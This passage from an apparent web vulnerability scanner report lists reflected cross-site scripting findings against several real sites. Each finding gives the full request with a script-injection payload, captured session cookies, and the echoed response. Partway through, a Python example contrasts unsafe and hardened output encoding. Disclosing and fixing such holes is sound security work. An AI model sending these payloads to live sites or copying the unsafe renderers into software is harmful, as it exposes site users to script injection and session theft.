<strong>"/common/404.html?p=/pages/landing_0928777<script>alert(1)</script>8208de7ceaf"</strong>
...[SNIP]...

2.436. http://www.csssports.com/pages/landing_09 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csssports.com
Path:   /pages/landing_09

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e731c"><script>alert(1)</script>d0ae0c06224 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pages/landing_09?e731c"><script>alert(1)</script>d0ae0c06224=1 HTTP/1.1
Host: www.csssports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=80897029.1292783235.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=6b05ec11a461d9a8387664878226f26a; __utma=80897029.607252618.1292783235.1292783235.1292783235.1; __utmc=80897029; __utmb=80897029;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:33:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:33:26 GMT
Content-Length: 17329
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<!--
web1.platformic.com
-->
<meta http-equiv="Content-Type" content="t
...[SNIP]...
<input type=hidden name="e731c"><script>alert(1)</script>d0ae0c06224" id = "e731c">
...[SNIP]...

2.437. http://www.csssports.com/pages/main [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csssports.com
Path:   /pages/main

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f26e6<script>alert(1)</script>c22b761abcc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagesf26e6<script>alert(1)</script>c22b761abcc/main HTTP/1.1
Host: www.csssports.com
Proxy-Connection: keep-alive
Referer: http://www.csssports.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:52 GMT
Connection: close
Content-Length: 762

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/pagesf26e6<script>alert(1)</script>c22b761abcc/main"</strong>
...[SNIP]...

2.438. http://www.csssports.com/pages/main [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csssports.com
Path:   /pages/main

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7b185<script>alert(1)</script>ae0caafdbfb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /pages/main7b185<script>alert(1)</script>ae0caafdbfb HTTP/1.1
Host: www.csssports.com
Proxy-Connection: keep-alive
Referer: http://www.csssports.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:53 GMT
Connection: close
Content-Length: 781

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/404.html?p=/pages/main7b185<script>alert(1)</script>ae0caafdbfb"</strong>
...[SNIP]...

2.439. http://www.csssports.com/pages/main [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csssports.com
Path:   /pages/main

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4c96"><script>alert(1)</script>c61d9f91efb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pages/main?d4c96"><script>alert(1)</script>c61d9f91efb=1 HTTP/1.1
Host: www.csssports.com
Proxy-Connection: keep-alive
Referer: http://www.csssports.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:52 GMT
Connection: close
Set-Cookie: PHPSESSID=e615b2bf36e09ec6d8014f4ea927fd3f; path=/
Content-Length: 33905

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<!--
web2.platformic.com
-->
<meta http-equiv="Content-Type" content="t
...[SNIP]...
<input type=hidden name="d4c96"><script>alert(1)</script>c61d9f91efb" id = "d4c96">
...[SNIP]...

2.440. http://www.dailycandy.com/atlanta/article/94262/5-Gifts-for-Homebodies [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dailycandy.com
Path:   /atlanta/article/94262/5-Gifts-for-Homebodies

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3051"><script>alert(1)</script>47ff100c80b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /atlanta/article/94262/5-Gifts-for-Homebodiesc3051"><script>alert(1)</script>47ff100c80b HTTP/1.1
Host: www.dailycandy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8FFCD6C19132F3BA5ADEB2B3FBED3604; s_pers=%20gpv_p1%3Dall%2520cities%7C1292785081959%3B%20s_depth%3D1%7C1292785081962%3B%20sspp%3D1292783281972%7C1292785081972%3B%20gpv_p4%3Dhome%7C1292785081978%3B%20gpv_url%3D/all-cities/%7C1292785081981%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%2016pv%3D1%3B%20s_sq%3D%3B; __utmz=38675254.1292783282.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|26872763051D1B17-4000010740006451[CE]; SaneID=174.121.222.18-1292783289689; __utma=38675254.1141008645.1292783282.1292783282.1292783282.1; __utmc=38675254; __utmb=38675254.1.10.1292783282;

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html;charset=utf-8
Date: Sun, 19 Dec 2010 18:33:51 GMT
Keep-Alive: timeout=15, max=62
Content-Language: en-US
Connection: close
Content-Length: 37822


<!DOCTYPE html>
<html lang="en" id="dailycandy-com">
<head>
<title>5 Gifts for Homebodies | Atlanta - DailyCandy </title>

<link href="/cache/base1292441116000.css" rel="stylesheet" type="t
...[SNIP]...
<a href="/login.jsp?ref=/atlanta/article/94262/5-Gifts-for-Homebodiesc3051"><script>alert(1)</script>47ff100c80b" class="save">
...[SNIP]...
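
The findings on this page land in three different output contexts: a text node (the 404 page's <strong>"..."</strong> in 2.430 and 2.431), a double-quoted attribute built from a request-parameter name (the hidden <input name="..."> in 2.433, 2.436 and 2.439), and a double-quoted href whose value is itself a query-string parameter (the /login.jsp?ref= link in 2.440). Each sink needs encoding for the context it is written into, and for the hidden input the better fix is to stop reflecting arbitrary parameter names at all. The Python below is added here as an example and is not either site's own code: the templates are reconstructed from the response snippets in the report, and the function names are assumptions. It shows each sink beside its hardened form and uses an HTML parser to confirm that the hardened output produces no script element.

```python
"""Context-correct encoding for the three reflection sinks this report shows.

Added example, not the applications' code.  The templates are reconstructed
from the response snippets in the report; function names are assumptions.
"""
import html
from html.parser import HTMLParser
from urllib.parse import quote


# Sink 1: request path echoed into a text node (findings 2.430, 2.431).
def render_404_unsafe(requested: str) -> str:
    return f'<p>The page <strong>"{requested}"</strong> was not found.</p>'


def render_404_safe(requested: str) -> str:
    # Text-node context: escaping &, < and > is what matters; quote=True is harmless here.
    return f'<p>The page <strong>"{html.escape(requested, quote=True)}"</strong> was not found.</p>'


# Sink 2: every query-parameter *name* echoed into a double-quoted attribute
# (findings 2.433, 2.436, 2.439).
def render_hidden_inputs_unsafe(params: dict) -> str:
    return "".join(f'<input type=hidden name="{k}">' for k in params)


def render_hidden_inputs_safe(params: dict, allowed: frozenset) -> str:
    # Two layers: only known names are echoed at all, and even those are
    # attribute-encoded so a future allowlist mistake cannot reopen the hole.
    return "".join(
        f'<input type="hidden" name="{html.escape(k, quote=True)}" id="{html.escape(k, quote=True)}">'
        for k in params if k in allowed
    )


# Sink 3: request path echoed as a query-string value inside an href (finding 2.440).
def render_login_link_unsafe(current_path: str) -> str:
    return f'<a href="/login.jsp?ref={current_path}" class="save">Save</a>'


def render_login_link_safe(current_path: str) -> str:
    # Encode inside-out: URL-encode the value for the query string first, then
    # HTML-encode the result for the attribute it is written into.
    ref = quote(current_path, safe="/")
    return f'<a href="/login.jsp?ref={html.escape(ref, quote=True)}" class="save">Save</a>'


class _TagCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def script_tags_in(markup: str) -> int:
    """Count <script> start tags as an HTML parser sees them; 0 means the injection is inert."""
    collector = _TagCollector()
    collector.feed(markup)
    return collector.tags.count("script")


if __name__ == "__main__":
    # Payload markers taken from findings 2.430, 2.433 and 2.440.
    path_payload = "/common/js/6d0e3<script>alert(1)</script>2dd732714b0"
    name_payload = 'c6dbf"><script>alert(1)</script>3e8dff6d570'
    ref_payload = '/atlanta/article/94262/5-Gifts-for-Homebodiesc3051"><script>alert(1)</script>47ff100c80b'
    for label, unsafe, safe in (
        ("404 text node", render_404_unsafe(path_payload), render_404_safe(path_payload)),
        ("hidden input", render_hidden_inputs_unsafe({name_payload: "1"}),
         render_hidden_inputs_safe({name_payload: "1", "page": "main"}, frozenset({"page"}))),
        ("login href", render_login_link_unsafe(ref_payload), render_login_link_safe(ref_payload)),
    ):
        print(f"{label:13} script tags: unsafe={script_tags_in(unsafe)} safe={script_tags_in(safe)}")
```

For the href case the order matters: HTML-encoding alone would keep the " from closing the attribute, but an & or # in the path would still reach the browser decoded and alter the ref parameter, so the value is URL-encoded for the query string first and the result HTML-encoded for the attribute.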

2.441. http://www.dailycandy.com/dallas/article/94178/Artsy-Gifts-Shopping-at-Nest [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dailycandy.com
Path:   /dallas/article/94178/Artsy-Gifts-Shopping-at-Nest

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59667"><script>alert(1)</script>ea3e5fd6674 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dallas/article/94178/Artsy-Gifts-Shopping-at-Nest59667"><script>alert(1)</script>ea3e5fd6674 HTTP/1.1
Host: www.dailycandy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8FFCD6C19132F3BA5ADEB2B3FBED3604; s_pers=%20gpv_p1%3Dall%2520cities%7C1292785081959%3B%20s_depth%3D1%7C1292785081962%3B%20sspp%3D1292783281972%7C1292785081972%3B%20gpv_p4%3Dhome%7C1292785081978%3B%20gpv_url%3D/all-cities/%7C1292785081981%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%2016pv%3D1%3B%20s_sq%3D%3B; __utmz=38675254.1292783282.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|26872763051D1B17-4000010740006451[CE]; SaneID=174.121.222.18-1292783289689; __utma=38675254.1141008645.1292783282.1292783282.1292783282.1; __utmc=38675254; __utmb=38675254.1.10.1292783282;

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html;charset=utf-8
Date: Sun, 19 Dec 2010 18:33:55 GMT
Keep-Alive: timeout=15, max=73
Content-Language: en-US
Connection: close
Content-Length: 37655


<!DOCTYPE html>
<html lang="en" id="dailycandy-com">
<head>
<title>Artsy Gifts - Shopping at Nest | Dallas - DailyCandy </title>

<link href="/cache/base1292441116000.css" rel="stylesheet"
...[SNIP]...
<a href="/login.jsp?ref=/dallas/article/94178/Artsy-Gifts-Shopping-at-Nest59667"><script>alert(1)</script>ea3e5fd6674" class="save">
...[SNIP]...

2.442. http://www.dailycandy.com/los-angeles/article/94180/Los-Angeles-Events-and-Diversions [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dailycandy.com
Path:   /los-angeles/article/94180/Los-Angeles-Events-and-Diversions

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c262"><script>alert(1)</script>1279e8ec1e6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /los-angeles/article/94180/Los-Angeles-Events-and-Diversions8c262"><script>alert(1)</script>1279e8ec1e6 HTTP/1.1
Host: www.dailycandy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8FFCD6C19132F3BA5ADEB2B3FBED3604; s_pers=%20gpv_p1%3Dall%2520cities%7C1292785081959%3B%20s_depth%3D1%7C1292785081962%3B%20sspp%3D1292783281972%7C1292785081972%3B%20gpv_p4%3Dhome%7C1292785081978%3B%20gpv_url%3D/all-cities/%7C1292785081981%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%2016pv%3D1%3B%20s_sq%3D%3B; __utmz=38675254.1292783282.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|26872763051D1B17-4000010740006451[CE]; SaneID=174.121.222.18-1292783289689; __utma=38675254.1141008645.1292783282.1292783282.1292783282.1; __utmc=38675254; __utmb=38675254.1.10.1292783282;

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html;charset=utf-8
Date: Sun, 19 Dec 2010 18:33:55 GMT
Keep-Alive: timeout=15, max=77
Content-Language: en-US
Connection: close
Content-Length: 41126


<!DOCTYPE html>
<html lang="en" id="dailycandy-com">
<head>
<title>Los Angeles Events and Diversions | Los Angeles - DailyCandy </title>

<link href="/cache/base1292441116000.css" rel="styl
...[SNIP]...
<a href="/login.jsp?ref=/los-angeles/article/94180/Los-Angeles-Events-and-Diversions8c262"><script>alert(1)</script>1279e8ec1e6" class="save">
...[SNIP]...

2.443. http://www.dailycandy.com/new-york/article/94172/Custom-Family-Crests [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dailycandy.com
Path:   /new-york/article/94172/Custom-Family-Crests

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13dfc"><script>alert(1)</script>d1a68770457 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york/article/94172/Custom-Family-Crests13dfc"><script>alert(1)</script>d1a68770457 HTTP/1.1
Host: www.dailycandy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8FFCD6C19132F3BA5ADEB2B3FBED3604; s_pers=%20gpv_p1%3Dall%2520cities%7C1292785081959%3B%20s_depth%3D1%7C1292785081962%3B%20sspp%3D1292783281972%7C1292785081972%3B%20gpv_p4%3Dhome%7C1292785081978%3B%20gpv_url%3D/all-cities/%7C1292785081981%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%2016pv%3D1%3B%20s_sq%3D%3B; __utmz=38675254.1292783282.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|26872763051D1B17-4000010740006451[CE]; SaneID=174.121.222.18-1292783289689; __utma=38675254.1141008645.1292783282.1292783282.1292783282.1; __utmc=38675254; __utmb=38675254.1.10.1292783282;

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html;charset=utf-8
Date: Sun, 19 Dec 2010 18:34:00 GMT
Keep-Alive: timeout=15, max=55
Content-Language: en-US
Connection: close
Content-Length: 36873


<!DOCTYPE html>
<html lang="en" id="dailycandy-com">
<head>
<title>Custom Family Crests | New York - DailyCandy </title>

<link href="/cache/base1292441116000.css" rel="stylesheet" type="te
...[SNIP]...
<a href="/login.jsp?ref=/new-york/article/94172/Custom-Family-Crests13dfc"><script>alert(1)</script>d1a68770457" class="save">
...[SNIP]...

2.444. http://www.dailycandy.com/washington-dc/article/94234/5-Gifts-for-Art-Fanatics [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dailycandy.com
Path:   /washington-dc/article/94234/5-Gifts-for-Art-Fanatics

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1e19"><script>alert(1)</script>57d48670345 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /washington-dc/article/94234/5-Gifts-for-Art-Fanaticse1e19"><script>alert(1)</script>57d48670345 HTTP/1.1
Host: www.dailycandy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8FFCD6C19132F3BA5ADEB2B3FBED3604; s_pers=%20gpv_p1%3Dall%2520cities%7C1292785081959%3B%20s_depth%3D1%7C1292785081962%3B%20sspp%3D1292783281972%7C1292785081972%3B%20gpv_p4%3Dhome%7C1292785081978%3B%20gpv_url%3D/all-cities/%7C1292785081981%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%2016pv%3D1%3B%20s_sq%3D%3B; __utmz=38675254.1292783282.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|26872763051D1B17-4000010740006451[CE]; SaneID=174.121.222.18-1292783289689; __utma=38675254.1141008645.1292783282.1292783282.1292783282.1; __utmc=38675254; __utmb=38675254.1.10.1292783282;

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html;charset=utf-8
Date: Sun, 19 Dec 2010 18:34:16 GMT
Keep-Alive: timeout=15, max=1
Content-Language: en-US
Connection: close
Content-Length: 41608


<!DOCTYPE html>
<html lang="en" id="dailycandy-com">
<head>
<title>5 Gifts for Art Fanatics | Washington, D.C. - DailyCandy </title>

<link href="/cache/base1292441116000.css" rel="styleshe
...[SNIP]...
<a href="/login.jsp?ref=/washington-dc/article/94234/5-Gifts-for-Art-Fanaticse1e19"><script>alert(1)</script>57d48670345" class="save">
...[SNIP]...

2.445. http://www.exercisetv.tv/workout-videos/all/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.exercisetv.tv
Path:   /workout-videos/all/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload dc254'style%3d'x%3aexpression(alert(1))'5f1cb0a4076 was submitted in the REST URL parameter 2. This input was echoed as dc254'style='x:expression(alert(1))'5f1cb0a4076 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /workout-videos/alldc254'style%3d'x%3aexpression(alert(1))'5f1cb0a4076/ HTTP/1.1
Host: www.exercisetv.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=172502007.1292783303.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; __utma=172502007.1681628549.1292783303.1292783303.1292783303.1; __utmc=172502007; __qca=P0-544985607-1292783303522; __utmb=172502007.1.10.1292783303; ASP.NET_SessionId=t2obdpzj4e3ipnmm5bcxtg45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:35:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 205917
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Conten
...[SNIP]...
<a class='lstLnk' href='http://www.exercisetv.tv:80/workout-videos/alldc254'style='x:expression(alert(1))'5f1cb0a4076/?page=172'>
...[SNIP]...

2.446. http://www.fancast.com/blogs/2010/tuned-in-what-to-watch-today/what-to-watch-weekend-31/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fancast.com
Path:   /blogs/2010/tuned-in-what-to-watch-today/what-to-watch-weekend-31/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe8ad"><script>alert(1)</script>b2edcdf1fe7 was submitted in the REST URL parameter 3. This input was echoed as fe8ad\"><script>alert(1)</script>b2edcdf1fe7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/2010/tuned-in-what-to-watch-todayfe8ad"><script>alert(1)</script>b2edcdf1fe7/what-to-watch-weekend-31/ HTTP/1.1
Host: www.fancast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.6
X-Pingback: /blogs/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Date: Sun, 19 Dec 2010 18:12:16 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:17:16 GMT
Content-Length: 39571

<!DOCTYPE html>
<html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
   <head>
       <meta charset="utf-8">
       <title>What To Watch: Weekend | Fancast
...[SNIP]...
<meta property="og:url" content="http://www.fancast.com/blogs/2010/tuned-in-what-to-watch-todayfe8ad\"><script>alert(1)</script>b2edcdf1fe7/what-to-watch-weekend-31/"/>
...[SNIP]...

2.447. http://www.fancast.com/blogs/2010/tuned-in-what-to-watch-today/what-to-watch-weekend-31/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fancast.com
Path:   /blogs/2010/tuned-in-what-to-watch-today/what-to-watch-weekend-31/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aac6b</script><script>alert(1)</script>eec3ce1ded8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/2010/tuned-in-what-to-watch-todayaac6b</script><script>alert(1)</script>eec3ce1ded8/what-to-watch-weekend-31/ HTTP/1.1
Host: www.fancast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.6
X-Pingback: /blogs/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Date: Sun, 19 Dec 2010 18:12:21 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:17:21 GMT
Content-Length: 39601

<!DOCTYPE html>
<html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
   <head>
       <meta charset="utf-8">
       <title>What To Watch: Weekend | Fancast
...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.fancast.com/blogs/2010/tuned-in-what-to-watch-todayaac6b</script><script>alert(1)</script>eec3ce1ded8/what-to-watch-weekend-31/&layout=button_count&show_faces=false&width=120&height=20&action=like&colorscheme=light" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:h
...[SNIP]...

2.448. http://www.fancast.com/blogs/2010/tuned-in-what-to-watch-today/what-to-watch-weekend-31/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fancast.com
Path:   /blogs/2010/tuned-in-what-to-watch-today/what-to-watch-weekend-31/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a1ceb</script><script>alert(1)</script>eb55516c8da was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/2010/tuned-in-what-to-watch-today/what-to-watch-weekend-31/?a1ceb</script><script>alert(1)</script>eb55516c8da=1 HTTP/1.1
Host: www.fancast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.6
X-Pingback: /blogs/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Date: Sun, 19 Dec 2010 18:12:15 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:17:15 GMT
Content-Length: 39616

<!DOCTYPE html>
<html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
   <head>
       <meta charset="utf-8">
       <title>What To Watch: Weekend | Fancast
...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.fancast.com/blogs/2010/tuned-in-what-to-watch-today/what-to-watch-weekend-31/?a1ceb</script><script>alert(1)</script>eb55516c8da=1&layout=button_count&show_faces=false&width=120&height=20&action=like&colorscheme=light" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:120px; heig
...[SNIP]...

2.449. http://www.fancast.com/blogs/2010/tuned-in-what-to-watch-today/what-to-watch-weekend-31/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
